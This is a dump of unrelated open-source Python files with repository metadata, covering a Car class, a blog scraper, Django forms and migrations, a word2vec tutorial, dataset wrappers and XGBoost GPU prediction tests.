type - одне з перечисленних значеннь з CARS_TYPES в docs.
producer - одне з перечисленних значеннь в CARS_PRODUCER.
number - значення типу UUID. Присвоюється автоматично при створенні автомобілю.
mileage - значення типу float. Пробіг автомобіля в кілометрах.
Автомобілі можна перівнювати між собою за ціною.
При виводі(logs, print) автомобілю повинні зазначатися всі його атрибути.
Автомобіль має метод заміни номеру.
номер повинен відповідати UUID
"""
class Car:
def __init__(self, price, car_type, producer, mileage, number=None):
if not number:
self.number = uuid.uuid4()
else:
self.update_number(number)
try:
self.price = float(price)
except ValueError:
raise ValueError("Invalid price value")
if car_type not in CARS_TYPES:
raise Exception("Invalid type value")
self.car_type = car_type
if producer not in CARS_PRODUCER:
raise Exception("Invalid producer value")
self.producer = producer
try:
self.mileage = float(mileage)
except ValueError:
raise ValueError("Invalid mileage value")
def __str__(self):
return f"This car {self.car_type} type has {self.mileage} mileage and produced by {self.producer}. " \
f"It price ${self.price}. Car number: {self.number}"
def __repr__(self):
return f"Car(price={self.price}, type='{self.car_type}', producer='{self.producer}', mileage={self.mileage}, " \
f"number='{self.number}')"
def __lt__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price < other.price
def __le__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price <= other.price
def __gt__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price > other.price
def __ge__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price >= other.price
def __eq__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price == other.price
def update_number(self, number):
self.number = uuid.UUID(hex=str(number))
|
[
"zulteg@gmail.com"
] |
zulteg@gmail.com
|
facb9e2e327090fd6d8da5f7d8b5bd13b151d02f
|
24c7088effc63aa93682e16c99144b5649236905
|
/1. ZANPAX/Projeto1.py
|
f076feb3bd193ce36eb0e17daf1ac654b1d8ca41
|
[] |
no_license
|
FontesJ/HSM-AnaliseDeDados-Python
|
8885b01381b770004fd2e510825e21caa37ff463
|
910a19f67a88526f43d17620ae48492894c51bf9
|
refs/heads/master
| 2023-01-21T03:23:17.282799
| 2020-12-03T03:45:25
| 2020-12-03T03:45:25
| 283,621,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
valor_total = 56300
print('ISS: R$', (valor_total*0.04))
print('ICMS: R$', (valor_total*0.18))
|
[
"61214258+FontesJ@users.noreply.github.com"
] |
61214258+FontesJ@users.noreply.github.com
|
b1f59a5918d5f3fdfde7d110d73ff9c89f1ab8b0
|
859c2aa862ea03ac3088fca67fa1c47203dcd2f2
|
/api/proxy.py
|
aa99e2879329f54b43f3b4a64532667f05af6c5f
|
[
"MIT"
] |
permissive
|
linzhiming0826/ADSL
|
37932c6f45e6b36388750f160f0f47ce65346fae
|
b6ada0fd24da9716f0e413ee1254165f257d674d
|
refs/heads/master
| 2020-01-19T21:40:04.251505
| 2017-06-27T02:15:20
| 2017-06-27T02:15:20
| 94,221,675
| 6
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 884
|
py
|
# encoding:utf-8
import random
from config import REDIS_PROXY_KEY
from redis_db import RedisDB
class Proxy(object):
@classmethod
def get_proxy(self, module):
'''
获取代理,暂时只实现获取某一台代理的方法,可以自己扩展,随机获取
'''
result = {'rt': '0', 'msg': 'not proxy', 'proxy': None}
if module == 'one':
keys = RedisDB.proxy().hkeys(REDIS_PROXY_KEY)
key = random.choice(keys)
proxy = RedisDB.proxy().hget(REDIS_PROXY_KEY, key)
if proxy:
result = {'rt': '1', 'msg': 'success', 'proxy': proxy}
return result
@classmethod
def add_proxy(self, **kwargs):
'''
设置代理
'''
RedisDB.proxy().hset(REDIS_PROXY_KEY, kwargs['key'], kwargs['value'])
return {'rt': '1', 'msg': 'success'}
|
[
"120549827@qq.com"
] |
120549827@qq.com
|
086c95b2ddfc5adc86d46719eb747e52c6f96648
|
b319377590343ca6b77355bc95fad40640b6acc1
|
/爬取CSDN的博文.py
|
e06a6fd938a36a9298a5bf66b5d78c4da931136f
|
[] |
no_license
|
1395724712/LESSON_2019_10
|
8b9dec5ef0b7e6a177bc3bf50779e810560aea31
|
104bf1318e7f083ecca776cfefe7f3009523dbe3
|
refs/heads/master
| 2020-08-28T09:36:37.076078
| 2019-11-08T08:10:59
| 2019-11-08T08:10:59
| 217,662,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,817
|
py
|
# coding="utf-8"
# 这个程序用于爬去CSDN的博文并写入txt文件中
# 注意伪装成浏览器
# 将爬取错误的网站报错到另一个txt文件中
#
import gzip
import urllib.request
import re
import urllib.error
# 首先创建报头
header=[('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36'),('Accept-encoding', 'gzip')]
# header=[('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36')]
opener=urllib.request.build_opener()
opener.addheaders=header
#将报头安装的全局
urllib.request.install_opener(opener)
# 目标网址
url="https://www.csdn.net/"
# 读取网页
# origin_page=opener.open(url).read().decode("utf-8","ignore")
# origin_page=urllib.request.urlopen(url).read().decode("utf-8","ignore")
origin_page=urllib.request.urlopen(url).read()
origin_page=gzip.decompress(origin_page).decode("UTF-8")
# 正则项
# pat="<a href=(.*?) target=\"_blank\" data-report-click='{"
pat="<a href=\"(.*?)\" target=\"_blank\"\n.*? data-report-click='{"
# 这里为什么不能用re.S,如果使用该项的话会导致它过分跨行,导致取到的表项过大
All_link=re.compile(pat).findall(origin_page)
# print(origin_page)
print(All_link)
# 新建报头
# header2=[('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36'),('Accept-encoding', 'gzip')]
# opener2=urllib.request.build_opener()
# opener2.addheaders=header2
# 打开存储出错信息的文件
fp_err=open("E:/Lesson_result/Error.txt","w")
# 新的正则项
# 标题
pat_1="<title>(.*?)</title>"
# 内容
pat_2="<p>(.*?)</p>"
n=0
# 逐项打开All_link
for i in All_link:
try:
origin_child_page=urllib.request.urlopen(i).read()
# origin_child_page=origin_child_page.rstrip('\n')
print(origin_child_page.rstrip("\n"))
except Exception as error:
# 如果出错则向错误记录文件输出错误记录
print(error.__context__)
fp_err.write(i+"\n")
if hasattr(error,"reason"):
fp_err.write(error.reason)
fp_err.write("\n")
else:
child_page=gzip.decompress(origin_child_page).decode("UTF-8")
# child_page=child_page.decode()
n=n+1
print(n)
# print(child_page)
Title=re.compile(pat_1).findall(child_page)
# 如果打开成功,则以博文的题目为文件名,写入文件内容
# 这个i是避免Title为空的情况
fp=open("E:/Lesson_result"+str(i)+Title[0],"a")
content=re.compile(pat_2).findall(child_page)
for j in content:
fp.write(j+"\n")
fp.close()
# 不能忘记关闭文件
fp_err.close()
|
[
"1395724712@qq.com"
] |
1395724712@qq.com
|
04b2c738fce0a61ab8d20b1dfe635a06d7022115
|
5d48aa758fe884ea8d2c3e458a4c59079b2a9f93
|
/administracao/forms/usuario_forms.py
|
22e4431bed32b035e91f8c069c27bcfd460c7f11
|
[] |
no_license
|
JSSILLES/Ediaristas
|
0ce3b2be758516a86fa7d57303aa3f396122d519
|
fbc5fefed8c6716c2e790f34c13ebbd62a64187e
|
refs/heads/main
| 2023-07-12T02:37:15.485571
| 2021-08-20T22:44:47
| 2021-08-20T22:44:47
| 394,742,770
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 753
|
py
|
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.contrib.auth import get_user_model
from django.forms.models import fields_for_model
class CadastroUsuarioForm(UserCreationForm):
class Meta:
model = get_user_model()
fields = ['username','first_name','email','password1','password2']
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
user.is_superuser = True
user.set_password(self.cleaned_data['password1'])
if commit:
user.save()
return user
class EditarUsuarioForm(UserChangeForm):
password = None
class Meta:
model = get_user_model()
fields = ['username', 'first_name', 'email']
|
[
"jacqueline@gomara.tech"
] |
jacqueline@gomara.tech
|
ebc8310d4de429f0142a0a2b45c1ad58a75d5df8
|
79ad16a56df93085651886375920306e63121690
|
/tests/test_tutorial/test_connect/test_select/test_tutorial005.py
|
400c6483cbb307d2b153fa85489c98bbdf21684e
|
[
"MIT"
] |
permissive
|
macrosfirst/sqlmodel
|
4286f72144afbf1476368e3fd0ca895852799046
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
refs/heads/main
| 2023-08-14T02:09:27.072625
| 2021-09-29T13:31:54
| 2021-09-29T13:31:54
| 403,592,064
| 0
| 0
|
MIT
| 2021-09-29T13:31:55
| 2021-09-06T11:11:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
from unittest.mock import patch
from sqlmodel import create_engine
from ....conftest import get_testing_print_function
expected_calls = [
[
"Created hero:",
{
"age": None,
"id": 1,
"secret_name": "Dive Wilson",
"team_id": 2,
"name": "Deadpond",
},
],
[
"Created hero:",
{
"age": 48,
"id": 2,
"secret_name": "Tommy Sharp",
"team_id": 1,
"name": "Rusty-Man",
},
],
[
"Created hero:",
{
"age": None,
"id": 3,
"secret_name": "Pedro Parqueador",
"team_id": None,
"name": "Spider-Boy",
},
],
[
"Preventer Hero:",
{
"age": 48,
"id": 2,
"secret_name": "Tommy Sharp",
"team_id": 1,
"name": "Rusty-Man",
},
"Team:",
{"id": 1, "name": "Preventers", "headquarters": "Sharp Tower"},
],
]
def test_tutorial(clear_sqlmodel):
from docs_src.tutorial.connect.select import tutorial005 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
assert calls == expected_calls
|
[
"tiangolo@gmail.com"
] |
tiangolo@gmail.com
|
802060315660180fe6727d974e97580ddcaaf943
|
76e9267b7391fd3ee58e9fbaa2bea418cff910aa
|
/Desktop/auth/gg/ch1/blog/admin.py
|
8d9c8e2ee1f4ec19f812b3f045f6b8ecd05a4c6a
|
[] |
no_license
|
yoongyo/auth1
|
bd1b89a4733c1f20bae6274107cb0e886e98d0d6
|
aab569ed4473c2d431949bcaf72b71e003cc69a5
|
refs/heads/master
| 2020-03-23T04:43:06.627491
| 2018-07-16T06:22:42
| 2018-07-16T06:22:42
| 141,101,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
from django.contrib import admin
from .models import Post
class PostAdmin(admin.ModelAdmin):
list_display = ['id', 'title']
list_display_links = ['title']
search_fields = ['title']
admin.site.register(Post)
|
[
"jyg017@naver.com"
] |
jyg017@naver.com
|
d7c1ecaebb7212d893e273afcfb56bf1ca0a8853
|
1e2c05dfa2abf5a16cb75a68bc42d70256fccc6b
|
/infos/migrations/0001_initial.py
|
58c6044c8d8693c7955d098cbec4ca2d50f40a27
|
[
"MIT",
"CC-BY-SA-4.0"
] |
permissive
|
acdh-oeaw/apis-core
|
b491011a30226d0682be045517bee08c6af71bbd
|
508545fa5119e1895801cc02c33b62ee33518183
|
refs/heads/main
| 2023-09-01T03:04:19.622371
| 2023-05-17T14:21:48
| 2023-05-17T14:21:48
| 96,198,214
| 14
| 5
|
MIT
| 2023-06-12T12:40:21
| 2017-07-04T09:04:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,487
|
py
|
# Generated by Django 2.1.12 on 2019-09-30 11:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AboutTheProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(blank=True, max_length=300, verbose_name="Project's Title")),
('subtitle', models.CharField(blank=True, max_length=300, verbose_name="Project's Sub Title")),
('description', models.TextField(blank=True, verbose_name='Project Description')),
('author', models.CharField(blank=True, help_text='The names of the Agents responsible for this description', max_length=250, verbose_name='Authors')),
('github', models.CharField(blank=True, help_text="Link to the application's source code", max_length=250, verbose_name='Code Repo')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'About the Project',
'ordering': ['id'],
},
),
migrations.CreateModel(
name='ProjectInst',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=300, verbose_name='Name')),
('abbr', models.CharField(blank=True, max_length=300, verbose_name='Abbreviation')),
('description', models.TextField(blank=True, verbose_name='Short description of the Institution')),
('website', models.URLField(blank=True, max_length=300, verbose_name="Link to the Institution's website")),
('logo_url', models.URLField(blank=True, max_length=300, verbose_name="Link to the Insitution's Logo")),
('norm_url', models.URLField(blank=True, help_text='URL to any normdata record of the institution', max_length=300, verbose_name='Norm Data URL (OCRID, GND, VIAF, ...)')),
],
options={
'verbose_name': 'Institution involved in the Project',
'ordering': ['name'],
},
),
migrations.CreateModel(
name='TeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=300, verbose_name='Name')),
('description', models.TextField(blank=True, verbose_name='Short description of the Person')),
('website', models.URLField(blank=True, max_length=300, verbose_name="Link to the person's website")),
('role', models.CharField(blank=True, help_text='will be used to group the team member', max_length=300, verbose_name="The person's role in the project")),
('norm_url', models.URLField(blank=True, help_text='URL to any normdata record of the person', max_length=300, verbose_name='Norm Data URL (OCRID, GND, VIAF, ...)')),
],
options={
'verbose_name': 'Team Member',
'ordering': ['role', 'name'],
},
),
]
|
[
"m.schloegl@gmail.com"
] |
m.schloegl@gmail.com
|
dff21f390e678ffda8152453571a65ce260214f4
|
1f9c18ac3725513458321b80abd0bcf5d572d696
|
/python-ml/word2vec_basic.py
|
15fc4b9f7efc63606579c7a767fb59812ab0442b
|
[] |
no_license
|
CMEI-BD/ml
|
34270572adba16132011b16a8965c0c2f2327161
|
1d5b43bf63aa234b4dbe9563d30fae91a485d7a2
|
refs/heads/master
| 2020-03-19T07:28:27.530808
| 2018-06-05T09:01:52
| 2018-06-05T09:01:52
| 136,116,805
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,880
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 4 15:27:13 2018
@author: meicanhua
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import os
import random
import zipfile
import numpy as np
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# Step 1: Download the data.
url = 'http://mattmahoney.net/dc/'
def maybe_download(filename, expected_bytes):
"""Download a file if not present, and make sure it's the right size."""
if not os.path.exists(filename):
filename, _ = urllib.request.urlretrieve(url + filename, filename)
statinfo = os.stat(filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
print(statinfo.st_size)
raise Exception(
'Failed to verify ' + filename + '. Can you get to it with a browser?')
return filename
filename = maybe_download('text8.zip', 31344016)
# Read the data into a list of strings.
def read_data(filename):
"""Extract the first file enclosed in a zip file as a list of words."""
with zipfile.ZipFile(filename) as f:
data = tf.compat.as_str(f.read(f.namelist()[0])).split()
return data
vocabulary = read_data(filename)
print('Data size', len(vocabulary))
# Step 2: Build the dictionary and replace rare words with UNK token.
vocabulary_size = 50000
def build_dataset(words, n_words):
"""Process raw inputs into a dataset."""
count = [['UNK', -1]]
count.extend(collections.Counter(words).most_common(n_words - 1))
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary)
data = list()
unk_count = 0
for word in words:
if word in dictionary:
index = dictionary[word]
else:
index = 0 # dictionary['UNK']
unk_count += 1
data.append(index)
count[0][1] = unk_count
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
data, count, dictionary, reverse_dictionary = build_dataset(vocabulary,
vocabulary_size)
del vocabulary # Hint to reduce memory.
print('Most common words (+UNK)', count[:5])
print('Sample data', data[:10], [reverse_dictionary[i] for i in data[:10]])
data_index = 0
# Step 3: Function to generate a training batch for the skip-gram model.
def generate_batch(batch_size, num_skips, skip_window):
global data_index
assert batch_size % num_skips == 0
assert num_skips <= 2 * skip_window
batch = np.ndarray(shape=(batch_size), dtype=np.int32)
labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
span = 2 * skip_window + 1 # [ skip_window target skip_window ]
buffer = collections.deque(maxlen=span)
for _ in range(span):
buffer.append(data[data_index])
data_index = (data_index + 1) % len(data)
for i in range(batch_size // num_skips):
target = skip_window # target label at the center of the buffer
targets_to_avoid = [skip_window]
for j in range(num_skips):
while target in targets_to_avoid:
target = random.randint(0, span - 1)
targets_to_avoid.append(target)
batch[i * num_skips + j] = buffer[skip_window]
labels[i * num_skips + j, 0] = buffer[target]
buffer.append(data[data_index])
data_index = (data_index + 1) % len(data)
# Backtrack a little bit to avoid skipping words in the end of a batch
data_index = (data_index + len(data) - span) % len(data)
return batch, labels
batch, labels = generate_batch(batch_size=8, num_skips=2, skip_window=1)
for i in range(8):
print(batch[i], reverse_dictionary[batch[i]],
'->', labels[i, 0], reverse_dictionary[labels[i, 0]])
# Step 4: Build and train a skip-gram model.
batch_size = 128
embedding_size = 128 # Dimension of the embedding vector.
skip_window = 1 # How many words to consider left and right.
num_skips = 2 # How many times to reuse an input to generate a label.
# We pick a random validation set to sample nearest neighbors. Here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent.
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
num_sampled = 64 # Number of negative examples to sample.
graph = tf.Graph()
with graph.as_default():
# Input data.
train_inputs = tf.placeholder(tf.int32, shape=[batch_size])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(valid_examples, dtype=tf.int32)
# Ops and variables pinned to the CPU because of missing GPU implementation
with tf.device('/cpu:0'):
# Look up embeddings for inputs.
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
embed = tf.nn.embedding_lookup(embeddings, train_inputs)
# Construct the variables for the NCE loss
nce_weights = tf.Variable(
tf.truncated_normal([vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size)))
nce_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Compute the average NCE loss for the batch.
# tf.nce_loss automatically draws a new sample of the negative labels each
# time we evaluate the loss.
loss = tf.reduce_mean(
tf.nn.nce_loss(weights=nce_weights,
biases=nce_biases,
labels=train_labels,
inputs=embed,
num_sampled=num_sampled,
num_classes=vocabulary_size))
# Construct the SGD optimizer using a learning rate of 1.0.
optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)
# Compute the cosine similarity between minibatch examples and all embeddings.
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(
normalized_embeddings, valid_dataset)
similarity = tf.matmul(
valid_embeddings, normalized_embeddings, transpose_b=True)
# Add variable initializer.
init = tf.global_variables_initializer()
# Step 5: Begin training.
num_steps =10 #100001
with tf.Session(graph=graph) as session:
# We must initialize all variables before we use them.
init.run()
print('Initialized')
average_loss = 0
for step in xrange(num_steps):
batch_inputs, batch_labels = generate_batch(
batch_size, num_skips, skip_window)
feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}
# We perform one update step by evaluating the optimizer op (including it
# in the list of returned values for session.run()
_, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)
average_loss += loss_val
if step % 2000 == 0:
if step > 0:
average_loss /= 2000
# The average loss is an estimate of the loss over the last 2000 batches.
print('Average loss at step ', step, ': ', average_loss)
average_loss = 0
# Note that this is expensive (~20% slowdown if computed every 500 steps)
if step % 10000 == 0:
sim = similarity.eval()
for i in xrange(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
nearest = (-sim[i, :]).argsort()[1:top_k + 1]
log_str = 'Nearest to %s:' % valid_word
for k in xrange(top_k):
close_word = reverse_dictionary[nearest[k]]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
final_embeddings = normalized_embeddings.eval()
# Step 6: Visualize the embeddings.
def plot_with_labels(low_dim_embs, labels, filename='tsne.png'):
assert low_dim_embs.shape[0] >= len(labels), 'More labels than embeddings'
plt.figure(figsize=(18, 18)) # in inches
for i, label in enumerate(labels):
x, y = low_dim_embs[i, :]
plt.scatter(x, y)
plt.annotate(label,
xy=(x, y),
xytext=(5, 2),
textcoords='offset points',
ha='right',
va='bottom')
plt.savefig(filename)
try:
# pylint: disable=g-import-not-at-top
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)
plot_only = 500
low_dim_embs = tsne.fit_transform(final_embeddings[:plot_only, :])
labels = [reverse_dictionary[i] for i in xrange(plot_only)]
plot_with_labels(low_dim_embs, labels)
except ImportError:
print('Please install sklearn, matplotlib, and scipy to show embeddings.')
|
[
"meicanhua@didichuxing.com"
] |
meicanhua@didichuxing.com
|
adf46f01ac43eb7680ef244d505c63a64f5e6a98
|
1c4393200a17da79c2f059df7c4fd2dc5f4c3bb3
|
/evovrp/main.py
|
fd45e8e173210faa374ab19282df77bbcefac482
|
[
"MIT"
] |
permissive
|
bsmdev/evovrp
|
4a0f232c5f816de9cc51e023f78e2d64ad92712c
|
16d85d1035019ec9b16d096415423a65b546bd88
|
refs/heads/master
| 2020-12-29T04:35:25.024612
| 2019-06-19T15:01:08
| 2019-06-19T15:01:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,414
|
py
|
import evovrp.file as file
import evovrp.method as method
import evovrp.directory as directory
import evovrp.evaluation as evaluation
from random import randint
from NiaPy.util import Task, OptimizationType
from NiaPy.algorithms.basic.ga import GeneticAlgorithm
def print_result(best_instance):
"""Prints a result.
Prints overall best instance information to output.
Args:
best_instance: A Fitness object, indicating overall best instance.
Returns:
Method does not return anything.
"""
print('Best instance: ')
print('Generation: ' + str(best_instance.generation))
print('Instance: ' + str(best_instance.instance))
print('Fitness: ' + str(round(best_instance.value, 2)))
print('Phenotype: ' + str(best_instance.phenotype))
def main(file_name, algorithm, iterations, population_size, phenotype_coding):
"""Main function.
Function is used for connecting the main parts of a project. Firstly, it
calls deletion of before created image directories. Then it calls file
reading method and so gets parsed objects from it. It creates new task
with given information and runs it using selected evolutionary algorithm.
Lastly, it calls printing information of overall best instance to output.
Args:
file_name: A string, indicating name of a file, which will be read.
algorithm: A NiaPy algorithm, indicating evolutionary algorithm
that will be used.
iterations: An integer, indicating number of repetitions.
population_size: An integer, indicating number of instances that will
be created inside one generation.
phenotype_coding: An enum type, indicating which genotype-to-phenotype
coding will be used in evaluation.
Returns:
Method does not return anything.
"""
directory.Directory().delete_directories()
objects = file.File.read('../datasets/' + file_name)
task = Task(D=len(objects[1]), nFES=iterations, benchmark=evaluation.Evaluation(
objects, iterations, population_size, phenotype_coding), optType=OptimizationType.MINIMIZATION)
alg = algorithm(seed=randint(1000, 10000), task=task, NP=population_size)
result, fitness = alg.run()
print_result(evaluation.Evaluation.find_overall_best_instance(fitness))
if __name__ == '__main__':
main('C-mdvrptw/pr00', GeneticAlgorithm, 25, 5, method.Method.FIRST)
|
[
"matic.pintaric@outlook.com"
] |
matic.pintaric@outlook.com
|
42ce07fdee63e3aa5561265f2db6540b6095364b
|
ae4b075d34694a2d3b94892a2caead1dc6c6090b
|
/datasets/svhn.py
|
c136901f2ac1fb3c623a52b80c1b0978a0361459
|
[] |
no_license
|
MagnumEnforcer/self-supervised-learning
|
943f15130ac47839df8083f964b9223003905cad
|
115271aee4ebfb63fe8c89c93f7f4ac00638155a
|
refs/heads/main
| 2023-06-21T12:49:47.965418
| 2021-08-04T19:41:32
| 2021-08-04T19:41:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,988
|
py
|
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from torchvision.datasets.svhn import SVHN as _SVHN
class SVHN(_SVHN):
num_classes = 10
def __init__(self,
root: str,
split: str = 'train',
transform: object = None,
**kwargs):
super(SVHN, self).__init__(root=root,
split=split,
transform=transform,
download=kwargs.get('download', False))
assert isinstance(self.labels, np.ndarray) and self.labels.ndim == 1
assert isinstance(self.data, np.ndarray) and self.data.ndim == 4
self.data = np.transpose(self.data, (0, 2, 3, 1))
if 'proportion' in kwargs:
if kwargs['proportion'] < 1.:
raise NotImplementedError
def __getitem__(self, idx):
img, label = self.data[idx], self.labels[idx]
if self.transform is not None:
img = self.transform(img)
return dict(x=img, y=label, idx=idx)
class SVHNForMoCo(_SVHN):
def __init__(self,
root: str,
split: str = 'train',
query_transform: object = None,
key_transform: object = None):
super(SVHNForMoCo, self).__init__(root=root,
split=split,
transform=None,
target_transform=None,
download=False)
self.data = np.transpose(self.data, (0, 2, 3, 1))
self.query_transform = query_transform
self.key_transform = key_transform
def __getitem__(self, idx):
img, label = self.data[idx], self.labels[idx]
x1 = self.query_transform(img)
x2 = self.key_transform(img)
return dict(x1=x1, x2=x2, y=label, idx=idx)
class SVHNForCLAPP(_SVHN):
def __init__(self,
root: str,
split: str = 'train',
query_transform: object = None,
key_transform: object = None,
pseudo_transform: object = None):
super(SVHNForCLAPP, self).__init__(root=root,
split=split,
transform=None,
target_transform=None,
download=False)
self.data = np.transpose(self.data, (0, 2, 3, 1))
self.query_transform = query_transform
self.key_transform = key_transform
self.pseudo_transform = pseudo_transform
def __getitem__(self, idx):
img, label = self.data[idx], self.labels[idx]
x1 = self.query_transform(img)
x2 = self.key_transform(img)
x3 = self.pseudo_transform(img)
return dict(x1=x1, x2=x2, x3=x3, y=label, idx=idx)
|
[
"hgkahng@korea.ac.kr"
] |
hgkahng@korea.ac.kr
|
dac023cdab21e9d629d5d88ea13757f7b48df408
|
6a92f3be6482748148d431dfcb652b0816d288f7
|
/tests/python-gpu/test_gpu_prediction.py
|
6324e117b3e8f1e8977741d82b05ec6e50eb81cc
|
[
"Apache-2.0"
] |
permissive
|
Gerbuz/xgboost
|
24c1c8787d981aa9f0654382667a87ad1baf6bb3
|
38ee51478740cb1aae1cfa0791168d384c388082
|
refs/heads/master
| 2022-10-21T03:15:21.243492
| 2020-06-17T04:39:23
| 2020-06-17T04:39:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,076
|
py
|
import sys
import unittest
import pytest
import numpy as np
import xgboost as xgb
sys.path.append("tests/python")
import testing as tm
from test_predict import run_threaded_predict # noqa
rng = np.random.RandomState(1994)
class TestGPUPredict(unittest.TestCase):
def test_predict(self):
iterations = 10
np.random.seed(1)
test_num_rows = [10, 1000, 5000]
test_num_cols = [10, 50, 500]
# This test passes for tree_method=gpu_hist and tree_method=exact. but
# for `hist` and `approx` the floating point error accumulates faster
# and fails even tol is set to 1e-4. For `hist`, the mismatching rate
# with 5000 rows is 0.04.
for num_rows in test_num_rows:
for num_cols in test_num_cols:
dtrain = xgb.DMatrix(np.random.randn(num_rows, num_cols),
label=[0, 1] * int(num_rows / 2))
dval = xgb.DMatrix(np.random.randn(num_rows, num_cols),
label=[0, 1] * int(num_rows / 2))
dtest = xgb.DMatrix(np.random.randn(num_rows, num_cols),
label=[0, 1] * int(num_rows / 2))
watchlist = [(dtrain, 'train'), (dval, 'validation')]
res = {}
param = {
"objective": "binary:logistic",
"predictor": "gpu_predictor",
'eval_metric': 'logloss',
'tree_method': 'gpu_hist',
'max_depth': 1
}
bst = xgb.train(param, dtrain, iterations, evals=watchlist,
evals_result=res)
assert self.non_increasing(res["train"]["logloss"])
gpu_pred_train = bst.predict(dtrain, output_margin=True)
gpu_pred_test = bst.predict(dtest, output_margin=True)
gpu_pred_val = bst.predict(dval, output_margin=True)
param["predictor"] = "cpu_predictor"
bst_cpu = xgb.train(param, dtrain, iterations, evals=watchlist)
cpu_pred_train = bst_cpu.predict(dtrain, output_margin=True)
cpu_pred_test = bst_cpu.predict(dtest, output_margin=True)
cpu_pred_val = bst_cpu.predict(dval, output_margin=True)
np.testing.assert_allclose(cpu_pred_train, gpu_pred_train,
rtol=1e-6)
np.testing.assert_allclose(cpu_pred_val, gpu_pred_val,
rtol=1e-6)
np.testing.assert_allclose(cpu_pred_test, gpu_pred_test,
rtol=1e-6)
def non_increasing(self, L):
return all((y - x) < 0.001 for x, y in zip(L, L[1:]))
# Test case for a bug where multiple batch predictions made on a
# test set produce incorrect results
@pytest.mark.skipif(**tm.no_sklearn())
def test_multi_predict(self):
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
n = 1000
X, y = make_regression(n, random_state=rng)
X_train, X_test, y_train, y_test = train_test_split(X, y,
random_state=123)
dtrain = xgb.DMatrix(X_train, label=y_train)
dtest = xgb.DMatrix(X_test)
params = {}
params["tree_method"] = "gpu_hist"
params['predictor'] = "gpu_predictor"
bst_gpu_predict = xgb.train(params, dtrain)
params['predictor'] = "cpu_predictor"
bst_cpu_predict = xgb.train(params, dtrain)
predict0 = bst_gpu_predict.predict(dtest)
predict1 = bst_gpu_predict.predict(dtest)
cpu_predict = bst_cpu_predict.predict(dtest)
assert np.allclose(predict0, predict1)
assert np.allclose(predict0, cpu_predict)
@pytest.mark.skipif(**tm.no_sklearn())
def test_sklearn(self):
m, n = 15000, 14
tr_size = 2500
X = np.random.rand(m, n)
y = 200 * np.matmul(X, np.arange(-3, -3 + n))
